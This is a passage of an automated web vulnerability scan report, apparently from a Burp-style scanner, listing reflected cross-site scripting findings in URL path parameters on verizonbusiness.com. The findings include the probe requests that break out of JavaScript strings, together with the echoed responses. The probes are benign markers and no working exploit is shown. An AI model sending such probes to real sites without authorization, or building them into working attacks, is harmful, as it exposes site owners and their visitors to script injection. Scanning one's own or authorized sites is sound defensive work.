HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:27 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:27 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:27 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/networking/private5eaed';470ed5b6194/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.260. http://www.verizonbusiness.com/Products/networking/private/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/private/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9728"%3bae12270c155 was submitted in the REST URL parameter 3. This input was echoed as d9728";ae12270c155 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networking/privated9728"%3bae12270c155/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:56 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 43210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:56 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:56 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
{}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/networking/privated9728";ae12270c155/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.261. http://www.verizonbusiness.com/Products/networking/prof-svcs/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/prof-svcs/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9bcc"%3bd4afdda2138 was submitted in the REST URL parameter 1. This input was echoed as b9bcc";d4afdda2138 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsb9bcc"%3bd4afdda2138/networking/prof-svcs/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:42 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40660
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:42 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:42 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Productsb9bcc";d4afdda2138/networking/prof-svcs/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM EL
...[SNIP]...

1.262. http://www.verizonbusiness.com/Products/networking/prof-svcs/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/prof-svcs/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5752'%3b7ca11612774 was submitted in the REST URL parameter 1. This input was echoed as b5752';7ca11612774 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsb5752'%3b7ca11612774/networking/prof-svcs/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:02 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40658
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:02 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:02 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Productsb5752';7ca11612774/networking/prof-svcs/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.263. http://www.verizonbusiness.com/Products/networking/prof-svcs/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/prof-svcs/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4cea"%3bb0086ace80a was submitted in the REST URL parameter 2. This input was echoed as d4cea";b0086ace80a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networkingd4cea"%3bb0086ace80a/prof-svcs/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:31 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42323
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:31 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
atch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/networkingd4cea";b0086ace80a/prof-svcs/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR S
...[SNIP]...

1.264. http://www.verizonbusiness.com/Products/networking/prof-svcs/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/prof-svcs/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8a6f'%3b8b1660ed888 was submitted in the REST URL parameter 2. This input was echoed as a8a6f';8b1660ed888 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networkinga8a6f'%3b8b1660ed888/prof-svcs/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:44 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42323
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:44 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:44 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/networkinga8a6f';8b1660ed888/prof-svcs/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.265. http://www.verizonbusiness.com/Products/networking/prof-svcs/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/prof-svcs/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 119a1"%3bba760f946ef was submitted in the REST URL parameter 3. This input was echoed as 119a1";ba760f946ef in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networking/prof-svcs119a1"%3bba760f946ef/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:00 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43216
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:00 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:00 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...


hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/networking/prof-svcs119a1";ba760f946ef/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.266. http://www.verizonbusiness.com/Products/networking/prof-svcs/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/prof-svcs/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21357'%3be751f4c7565 was submitted in the REST URL parameter 3. This input was echoed as 21357';e751f4c7565 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networking/prof-svcs21357'%3be751f4c7565/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:11 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43214
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:11 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/networking/prof-svcs21357';e751f4c7565/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.267. http://www.verizonbusiness.com/Products/security/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3dc20"%3bdf5d84120c4 was submitted in the REST URL parameter 1. This input was echoed as 3dc20";df5d84120c4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products3dc20"%3bdf5d84120c4/security/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:40:22 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40634
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:40:22 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products3dc20";df5d84120c4/security/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SU
...[SNIP]...

1.268. http://www.verizonbusiness.com/Products/security/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8087c'%3b990cb1d007b was submitted in the REST URL parameter 1. This input was echoed as 8087c';990cb1d007b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products8087c'%3b990cb1d007b/security/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:38 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40634
Date: Wed, 17 Nov 2010 00:40:38 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:38 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products8087c';990cb1d007b/security/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.269. http://www.verizonbusiness.com/Products/security/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1d1f"%3b477c6ad0444 was submitted in the REST URL parameter 2. This input was echoed as d1d1f";477c6ad0444 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/securityd1d1f"%3b477c6ad0444/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:47 GMT
Content-Type: text/html
Content-Length: 42301
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:40:47 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:47 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/securityd1d1f";477c6ad0444/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.270. http://www.verizonbusiness.com/Products/security/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 172b1'%3bf36e47faf72 was submitted in the REST URL parameter 2. This input was echoed as 172b1';f36e47faf72 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security172b1'%3bf36e47faf72/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:53 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42299
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:40:54 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/security172b1';f36e47faf72/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.271. http://www.verizonbusiness.com/Products/security/compliance/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/compliance/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1685'%3be89d42998b6 was submitted in the REST URL parameter 1. This input was echoed as f1685';e89d42998b6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsf1685'%3be89d42998b6/security/compliance/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:34 GMT
Content-Type: text/html
Content-Length: 40656
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:34 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:34 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Productsf1685';e89d42998b6/security/compliance/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.272. http://www.verizonbusiness.com/Products/security/compliance/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/compliance/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c36ab"%3bf94a793a7ac was submitted in the REST URL parameter 1. This input was echoed as c36ab";f94a793a7ac in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsc36ab"%3bf94a793a7ac/security/compliance/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
